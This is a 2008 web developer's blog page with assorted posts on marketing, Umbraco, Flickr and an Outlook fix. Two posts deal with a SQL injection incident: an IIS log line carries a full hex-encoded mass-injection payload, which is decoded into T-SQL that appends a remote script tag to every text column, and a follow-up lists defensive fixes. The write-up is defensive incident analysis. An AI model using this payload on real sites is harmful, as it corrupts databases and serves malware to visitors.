Tim

Footprints in the snow of a warped mind

Blog Home About Me Photo Album The Site Doctor Blog Feed by Email Portfolio

Tag Cloud

AJAX (4) ASP (6) ASP.Net (40) Error Reporting (2) Web Service (1) WSDL (1) Atlas (2) Business (64) Business Start-up Advice (24) Client (10) Expanding Your Business (15) C# (10) Canoeing (4) Canoe Racing (5) Cheshire Ring Race (5) Racing (2) Training (4) CIMA (1) Cisco (1) 7970G (1) CSS (3) dasBlog (2) Design (9) Icons (1) Development (7) General (37) Christmas (6) Fun and Games (11) Internet (18) Random (43) RX-8 (8) Home Cinema (2) Hosting (1) IIS (8) iPhone (1) JavaScript (2) Marketing (3) Multipack (1) Networking (2) Nintendo (1) OS Commerce (1) Photography (1) PHP (1) PowerShell (1) Press Release (1) Security (1) SEO (5) Server Maintenance (3) Server Management (8) Software (9) Office (4) Visual Studio (7) Windows (4) Vista (1) SQL Server (12) Testing (1) The Site Doctor (90) Turnover Challenge (1) Umbraco (10) Web Development (42) WebDD (33) Wii (1)

Atom 1.0 RSS 2.0 CDF 

Search

<June 2008>
SunMonTueWedThuFriSat
25262728293031
1234567
891011121314
15161718192021
22232425262728
293012345

Recent Comments

Total Comments: 210
View all 210 comments

Blog Archive

Various Links

Blogs I Read

 Google Blog
Official Google Webmaster Central Blog
 Matt Cutts
Gadgets, Google, and SEO
 Ol' Deano's Blog
My mate Dean's blog on my space, equally as random as mine but not off on as much of a tangent!
 Sam's Blog
Sam is one of my younger brothers studying Product Design and Manufacture at Loughborough, this is his blog :) Enjoy!

Recent Tracks

last.fm - The Social Music Revolution

Disclaimer
The opinions expressed herein are my own personal opinions and do not represent my employer's view in any way.

newtelligence dasBlog 2.0.7226.0

Send mail to the author(s) Email Me (Tim Gaunt)

© 2008 Tim Gaunt.

Sign In

Get Windows Live Alerts

 Thursday, June 12, 2008

The Site Doctor gets creative with print

Thursday, June 12, 2008 8:59:50 PM (GMT Standard Time, UTC+00:00)

After months of  painstaking work I can FINALLY reveal what we've been beavering away on -our new brochure with a twist. If you're involved in marketing at all you're probably already aware how hard it is to print interactive designs. Regardless of that, we needed some way of advertising so we got our thinking caps on.

The brief was simple: we needed to come up with a way of marketing our bespoke design and development services. Being a creative company we also wanted something that stood out from the other 1,001 West Midlands based web design companies. It should also reflect the attention to detail and quality that goes into our web design and development.

Our target audience was to be high end management so the brochure had to be quick and easy to navigate, have clear calls to actions and require minimum effort to read (unlike my blog!!).

As all "good" ideas* start with a pen, napkin and one too many coffees, we trotted off to our favourite Costa for a brain storming session and here's what we came up with:

* not all good ideas do but some do but it's a good excuse for a coffee.

We went through all sorts of ideas ranging from having themed TicTacs produced, to sending out branded bottles of wine, most of the ideas were dismissed because they had either already been done or would just be binned/eaten and forgotten. We needed something that stood out.

For those of you who can't understand our scribbling's, we decided upon a brochure with a twist (or two).

The First idea was to make the brochure quick and simple to navigate -like the websites we develop so we decided to go a little Avant Garde (off the wall/pushing the boundaries) and opted for a coloured tabbed navigation system, the idea was taken in part from an Argos catalogue which uses colours to separate the sections. I felt combining the tabs and colours would ensure the brochure was quick and easy to use.

The next issue we addressed was how to get the reader to open the brochure, it sounds silly but getting someone to open the brochure (let alone reading it) is pretty hard to do so we decided to offer the reader an incentive and what was better than our new stressball? Why not put one on the front of the brochure?

I've jumped a few stages in our thinking but here's the final product -a brochure with a stressball attached to the front, mimicking a pill packet (complete with foil on the inside to get the pill out), coloured tab page navigation and loads more.

The Site Doctor gets creative with print
Useful Links:  #  digg it!  del.icio.us  Technorati  email it!  Post CommentsComments [0]  Trackback Link
CategoriesTags: Business | Expanding Your Business | Design | Marketing | The Site Doctor
 Wednesday, June 11, 2008

Missing ratings from Windows Live Writer

Wednesday, June 11, 2008 9:11:16 PM (GMT Standard Time, UTC+00:00)

As fantastic as it is, and I love the Flickr plugin (being new to Flickr this was what convinced me) but although they look the same, there are a couple of differences (that or I've not found them yet). One of the big issues I've found is that you can't filter the results by ranking, here are two screenshots, the first from Windows Photo Gallery:

And Windows Live Photo Gallery:

So where has the "Ratings" tab gone I wonder.

The other thing that I've not yet worked out is how to flag photos as "Private" and be able to hide them -perhaps that's not possible.

Another thing that would be nice is if it remembered when you had uploaded a photo to Flickr and stopped it re-uploading.
Missing ratings from Windows Live Writer
Useful Links:  #  digg it!  del.icio.us  Technorati  email it!  Post CommentsComments [1]  Trackback Link
CategoriesTags: Random | Photography | Software
 Tuesday, June 10, 2008

CodeGarden 08 -been there, done that, got the t-shirt!

Tuesday, June 10, 2008 6:18:53 PM (GMT Standard Time, UTC+00:00)

So things have been manic here the past week, for those of you who didn't know, I popped over to Denmark at the last minute to attend Umbraco's CodeGarden 08. It was great fun and I have to thank Niels Hartvig and Per Ploug Hansen for putting on a great couple of days.

You can check out my photos from the event on Flickr (bear with me, I'm just getting started with Flickr).

I'm sure a fair few people have blogged about the highlights (if you're interested check www.umbraco.org) but the biggy was announcing the release of Umbraco v3.14.0 which is pretty exciting news as it has a ton of feature enhancements and UI improvements. Also, you'll be pleased to hear that they're making 2008 the year of Umbraco documentation!

Another interesting points from the conference was the pending release of Umbraco.TV which will feature tutorial videos and insights from the core team on how to use Umbraco and the Umbraco store which allows you to easily distribute the packages you make :) All in all some interesting developments.

There were also a fair few English developers at the conference so discussion inevitably turned to a UK meet (I know there are a fair few designers and developers here that couldn't justify the expense) so that's something that I'm going to look into setting up. If this is something you'd be interested in, leave a comment or drop me an email and we'll see how much interest there is.

To all the rest of you -it was great to meet you, you're all a lovely bunch and I look forward to meeting you again at CodeGarden 09!

The other thing I've finally clarified (this is for you Simon!) is the Umbraco licensing rules so if you're unsure on those, check out my post on when you need to purchase an Umbraco license (the answer is always -or never, it's up to you!).

CodeGarden 08 -been there, done that, got the t-shirt!
Useful Links:  #  digg it!  del.icio.us  Technorati  email it!  Post CommentsComments [5]  Trackback Link
CategoriesTags: Development | Networking | The Site Doctor | Umbraco
 Monday, June 09, 2008

When do I need to buy an Umbraco license?

Monday, June 09, 2008 5:16:00 PM (GMT Standard Time, UTC+00:00)

This may seem a slightly obvious/silly post but the answer is simple -it's just not *that* well documented/explained.

In a nutshell there are three scenarios you need to worry about:

  • Using Umbraco in a non-commercial environment with the branding (logos etc) intact -no fee
  • Using Umbraco in a commercial environment with the branding (logos etc) intact -no fee
  • Using Umbraco in a commercial environment without the branding (logos etc) -fee

So there you have it. But to be fair, you should always pay for it if you're using it in a commercial environment just because it's a great product (and it's good for your karma!)

When do I need to buy an Umbraco license?
Useful Links:  #  digg it!  del.icio.us  Technorati  email it!  Post CommentsComments [0]  Trackback Link
CategoriesTags: Development | Umbraco
 Thursday, June 05, 2008

Flickr Pro free to BT Yahoo! users

Thursday, June 05, 2008 8:25:24 PM (GMT Standard Time, UTC+00:00)

I've never really got into Flickr but now I'm using Windows Live Photo Gallery which can automatically upload images for you I thought I'd give it ago. While checking out what the restrictions were on my standard (free!) account I was pleasantly surprised to find out I've actually got a pro account courtesy of BT Yahoo! -Shame I'm leaving them this month ;)

Flickr Pro free to BT Yahoo! users
Useful Links:  #  digg it!  del.icio.us  Technorati  email it!  Post CommentsComments [0]  Trackback Link
CategoriesTags: Internet | Software
 Friday, May 30, 2008

Can't launch Outlook when switching to Exchange from POP3

Friday, May 30, 2008 8:14:36 PM (GMT Standard Time, UTC+00:00)

I've had an irritating issue for the past week or so. I used to use POP3 in Outlook however the other day I switched to the internal Exchange server and I got stuck in an eternal loop saying that Exchange needed to connect to the server to synchronise the offline files and folders -but you couldn't do that until the files were transferred.

The message looked something like this:

The set of folders cannot be opened. You must connect to Microsoft Exchange with the current profile before you can synchronise your folders with your offline folder file.

Took me a while but the fix was to remove the profile and setup the exchange inbox first:

  1. Click Start, and then click Control Panel.
  2. Click Switch to Classic View, and then double-click Mail.
  3. In the Mail Setup dialog box, click Show Profiles.
  4. On the General tab, click Prompt for a profile to be used, and then click Add.
  5. In the Profile Name box, type a descriptive name for the new e-mail profile, and then click OK.
  6. In the E-mail Accounts dialog box, click Add a new e-mail account, and then click Next.
  7. Click the appropriate server type for your new e-mail account, and then click Next.
  8. Type your account information in the required boxes, and then click Next.
  9. Click Finish, and then click OK.
Can't launch Outlook when switching to Exchange from POP3
Useful Links:  #  digg it!  del.icio.us  Technorati  email it!  Post CommentsComments [0]  Trackback Link
CategoriesTags: Office | The Site Doctor
 Thursday, May 29, 2008

A seriously elegant SQL Injection -how it was sorted

Thursday, May 29, 2008 2:32:33 PM (GMT Standard Time, UTC+00:00)

Doug Setzer posted this comment in response to my recent "A seriously elegant SQL Injection" post and I thought it may be of interest to others so have promoted it to a post...

Well, I'll step up and say that I am the "mate" who had this done.  Tim's right - *always* sanitize your inputs.  In my defence, this was a site that I inherited from a previous contractor.  I'm not entirely absent of blame, I still should have done a security sweep through the code.

I'd like to document the steps that I went through once this was identified to try and avoid this kind of thing in the future.

  1. Edit every web page that executes a query to sanitize any parameters that are passed in.  Since the site was classic ASP, I used my "SQLStringFieldValue" function:
    www.27seconds.com/kb/article_view.aspx?id=50
  2. Modify the DB user account that is used to have *read only* access to the database
  3. Modify the pages that DO write to the database to have *read/write* access to the specific tables that are being changed.  This limits the number of places that SQL Injection can occur to a smaller set than was previously possible.  I still sanitize all of my input, but I'm extra spastic in these database calls.
  4. Add database auditing (triggers writing to mirror tables with audit event indicator & date/time) to see when data changes occur.  This is still problematic with the pages that have "write" permissions to the tables, but again- that footprint is much smaller.
    My future plans are to move to a view/stored procedure based architecture.  I can then limit write permissions to just the stored procedures and read permissions to just the views.  My grand gusto plans are to move to using command objects & parameters, but I'd sooner re-write the entire site.

Although Doug's attack wasn't the same nihaorr1.com attack that's going around atm it was similar so I would imagine other's will find this useful.

It still amazes me how many developers still fail to sanitise strings, only last week I came across another site (in PHP) that was allowing simple SQL injections to be used to log into their administration system. It was down to a problem with the sanitization string, but why not at least check your site before it goes live? It takes 2 minutes and even less to fix...

For those of you who need a few pointers, there's a good discussion or two about sanitising strings on the 4 Guys From Rolla site.

A seriously elegant SQL Injection -how it was sorted
Useful Links:  #  digg it!  del.icio.us  Technorati  email it!  Post CommentsComments [2]  Trackback Link
CategoriesTags: ASP | ASP.Net | C# | Development | IIS | Security | SQL Server | Web Development
 Wednesday, May 28, 2008

A seriously elegant SQL Injection

Wednesday, May 28, 2008 4:46:49 PM (GMT Standard Time, UTC+00:00)

Having been subject to a recent hack myself I can sympathise with one of my mates who had a SQL injection attack succeed on one of his sites earlier today. Admitadly mine was due to poor internal maintanence whereas this is almost a piece of art...

This is an extract from the IIS log file:

2008-05-20 21:21:28 W3SVC1 xxx.xxx.xxx.xxx POST /news_detail.asp newsID=37;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F0039006900350074002E0063006E002F0061002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);-- 80 - 221.130.180.215 Mozilla/3.0+(compatible;+Indy+Library) - www.domain.com 200 0 0

This works out to:

DECLARE @T varchar(255), @C varchar(255) 
DECLARE Table_Cursor
CURSOR FOR 
select
    a.name,b.name 
from
    sysobjects a,syscolumns b 
where 
    a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 

OPEN Table_Cursor 
FETCH NEXT 
FROM  Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0)

    BEGIN
        exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://hackersscriptdomain.cn/a.js></script>''')
        FETCH NEXT FROM  Table_Cursor INTO @T,@C 
    END 
CLOSE Table_Cursor 

DEALLOCATE Table_Cursor

Very nice :) (though I can't condone hacking -no matter how elegant it is!)

p.s. The moral of the story is Always sanitise your strings -it's easy!

A seriously elegant SQL Injection
Useful Links:  #  digg it!  del.icio.us  Technorati  email it!  Post CommentsComments [1]  Trackback Link
CategoriesTags: Internet | SQL Server | Web Development
Template based on a design by Arcsin. Valid CSS & XHTML.